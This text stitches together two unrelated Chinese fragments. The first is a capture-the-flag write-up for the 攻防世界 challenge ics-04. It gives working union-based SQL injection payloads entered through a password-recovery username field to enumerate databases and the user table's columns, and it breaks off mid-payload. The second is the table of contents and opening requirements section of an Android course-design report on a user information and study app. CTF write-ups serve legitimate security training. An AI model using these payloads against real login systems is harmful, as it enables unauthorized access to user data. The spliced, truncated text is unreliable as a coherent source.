密保

题目 攻防世界ics-04 工控云管理系统新添加的登录和注册页面存在漏洞，请找出flag。 解题思路 打开题目提供的环境，发现整个页面只有注册、登录、找回密码功能是可以用的，尝试注册一个账户进行登录，提示普通用户登录成功，没什么用，可以猜测出题者的意图是让我们拿到管理员账号登录获得flag。 打开找回密码界面，随意输入一个用户名，发现界面上会提示没有这个用户，因此此处应该可以爆破用户名，但是如果用户名不是常见用户名就是白费体力了，先搁置。 在用户名输入框尝试SQL注入，发现注入成功，于是尝试从这里入手拿到用户密码。 构造SQL语句： ' union select 1,2,group_concat(char(32,58,32),schema_name),4 from information_schema.schemata;# ，可以列出所有的数据库名，发现题目用到的库是cetc004。 构造SQL语句： ' union select 1,2,group_concat(char(32,58,32),column_name),4 from information_schema.columns where table_schema='cetc004' and table_name='user';# ，可以列出 user 表中所有的字段。 直接列出 user 表中所有的数据： ' union

1. 基于 Android 的 用户信息管理与学习 系统设计与实现 1.1 系统需求分析 3 1.1.1 操作可行性 3 1.1.2 功能分析 3 1.2 系统总体设计 3 1.2.1UML 类图 3 1.3 系统 测试 4 1.3.1 首页界面 4 1.3.2 “我”的界面 4 1.3.3 课程界面 4 1.3.4 注册界面 5 1.3.5 登录界面 5 1.3.6 设置界面 6 1.3.7 修改密码 6 1.3.8 设置密保 7 1.3.9 找回密码 7 1.3.10 个人资料 8 1.4 系统实现 9 1.4.1 清单文件 9 1.4.2 主要代码 10 1.5 技术说明 22 2. 课程设计总结 22 2.1 总结 22 1. 基于 Android 的 用户信息管理与学习 系统设计与实现 1.1 系统需求分析 1.1.1 操作可行性 系统的操作可行性是一个系统成功与否的关健，在很多系统中操作的合理性经常成为用户讨论的焦点，所以说系统设计的合理性既是需要考虑的关键也是对用户选择此系统的主要吸引力。 该系统的功能不能单一，这样既保证了用户的部分需求，也不会显得杂乱。 1.1.2 功能分析 本系统“用户信息管理与学校”包含首页、学习课程、用户注册、用户登录、个人资料、设置、修改密码、设置密保、找回密码、修改个人信息10个功能。 1.2 系统总体设计 1.2.1UML 类图 1.3